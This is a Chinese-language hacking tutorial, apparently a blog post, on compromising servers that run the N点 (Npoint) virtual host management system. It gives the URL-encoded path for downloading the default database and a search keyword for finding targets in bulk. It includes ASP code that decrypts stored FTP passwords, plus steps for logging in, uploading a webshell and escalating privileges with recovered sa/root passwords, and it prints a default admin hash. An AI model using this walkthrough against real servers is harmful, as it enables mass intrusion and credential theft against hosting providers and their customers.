N点虚拟主机管理系统漏洞
N点虚拟主机管理系统默认数据库地址为:\host_date#host # date#.mdb
url直接输入不行 这里咱们替换下 #=%23 空格=%20
修改后的下载地址为/host_date/%23host%20%23%20date%23196.mdb
/host_date/%23host%20%23%20date%23.mdb
#host # date#196.mdb
N点默认安装路径C:\Program Files\NpointSoft\npointhost\web
D:\Program Files\NpointSoft\npointhost\web
默认权限可读。遇到对方所用虚拟主机是N点时候 可以考虑 读取该文件夹下载数据库
进入正题
挖掘机批量挖掘 关键词N点虚拟主机管理系统 - Powered By Npoint
/host_date/%23host%20%23%20date%23.mdb
N点数据库下载之后找到sitehost表 FTPuser&FTPpass 值 FTPpass是N点加密数据然后用N点解密工具解密得到FTP密码
N点解密工具代码
<%
set iishost=server.CreateObject(“npoint.host”)
x=iishost.Eduserpassword(“FTPpass值”,0)
response.write x
%>
本地搭建N点环境在N点目录打开访问即可。得到密码减去后10位字符即为 N点的虚拟主机管理密码。
然后需要在管理系统登陆确认下 在hostcs 表 找到 Hostip 或者hostdomain
一般默认是 Hostip=127.0.0.1 hostdomain=www.npointhost.com 这里可以不管 因为 这里不修改的话就是服务器默认ip地址sitehost 表的host_domain就是绑定的域名 直接查下IP地址即可 咱们批量的话 扫描的地址即可。
管理系统地址即为IP地址 选择虚拟主机 登录即可
接下来传shell大家应该都会了。
接下来说提权 hostcs表存有sa root账户的密码 解密方法一样。默认都是 解密结果123456
还有就是在adminlogo 存在N点系统管理密码 30位的cfs加密可以在http://www.md5.com.cn/cfs 碰撞下试试 或者用asm的工具破解下我的运气不好没成功过
3057C0DB854C878E72756088058775 这个是默认admin的密码
如果搞定cfs密码之后可以参考文章《N致命的漏洞 直接拿服务器权限》
我测试过程中,N点虚拟主机管理系统一直安装失败。
1.9.6 cy说 这个版本不行了
1.9.5 我自己安装一直说网络错误。
Writed By lcy
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
